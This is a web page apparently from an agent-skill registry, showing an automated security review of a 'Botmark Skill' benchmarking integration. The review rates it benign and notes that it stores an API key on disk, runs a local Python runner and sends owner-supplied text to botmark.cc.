Skillv2.20.0

ClawScan security

Botmark Skill · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

BenignMar 22, 2026, 6:06 AM

Verdict: Benign
Confidence: medium
Model: gpt-5-mini
Summary: The skill's requirements and instructions are coherent with a benchmarking integration: it needs a BotMark API key, uses curl+python3 to call the service and run a local runner, and persists the key for future runs — nothing in the package appears unrelated to its stated purpose, but it does write config and run local code so proceed only if you trust botmark.cc.
Guidance: This skill is internally consistent with its described benchmarking purpose, but it will (a) send your agent profile and owner-supplied text to botmark.cc, (b) persist your BOTMARK_API_KEY into openclaw.json and/or skills/botmark-skill/.botmark_env, and (c) execute a bundled Python runner that performs network calls. Only install if you trust botmark.cc and are comfortable storing the API key on disk. If you have concerns: inspect botmark_engine.py and setup.sh before running, run the skill in an isolated environment, or use a test API key (bm_test_) first. Also confirm whether any feedback or 'owner messages' are published publicly (the docs are inconsistent on this point) before sending sensitive content.

Review Dimensions

Purpose & Capability: okName/description (agent self-evaluation) match required items: BOTMARK_API_KEY, python3, curl, and an engine script. Required binaries and env vars are appropriate for making authenticated API calls and running the cached runner.
Instruction Scope: noteSKILL.md instructs the agent to call BotMark endpoints, save session_config and runner_script, run botmark_engine.py, and persist an API key to openclaw.json or skills/botmark-skill/.botmark_env. These actions are within the stated benchmark workflow but do include persistent storage of secrets and execution of a local script that performs network I/O; the SKILL.md also requires owner-supplied free-text fields (talktoowner, work_and_challenges) which are reasonably explained but can contain sensitive info.
Install Mechanism: okThere is no registry install spec (instruction-only install), but a setup.sh is provided which may download files from https://botmark.cc and write them into the OpenClaw workspace. Download sources are the vendor domain (not a shortener/personal IP). No obscure third-party hosts were used.
Credentials: noteOnly BOTMARK_API_KEY is required as the primary credential; optional BOTMARK_BINDING_ID and BOTMARK_SERVER_URL are explained. Requesting an API key and owner-provided profile text is proportionate to producing personalized reports, but note the skill stores the API key persistently (openclaw.json and/or .botmark_env) which increases the impact if the key is compromised.
Persistence & Privilege: notealways:false (no forced global presence). The setup script writes the API key into OpenClaw's openclaw.json and creates a .botmark_env file in the skill directory (chmod 600). This is expected for convenience, but it does modify the platform config file and creates persistent secret storage — users should be aware and approve this behavior.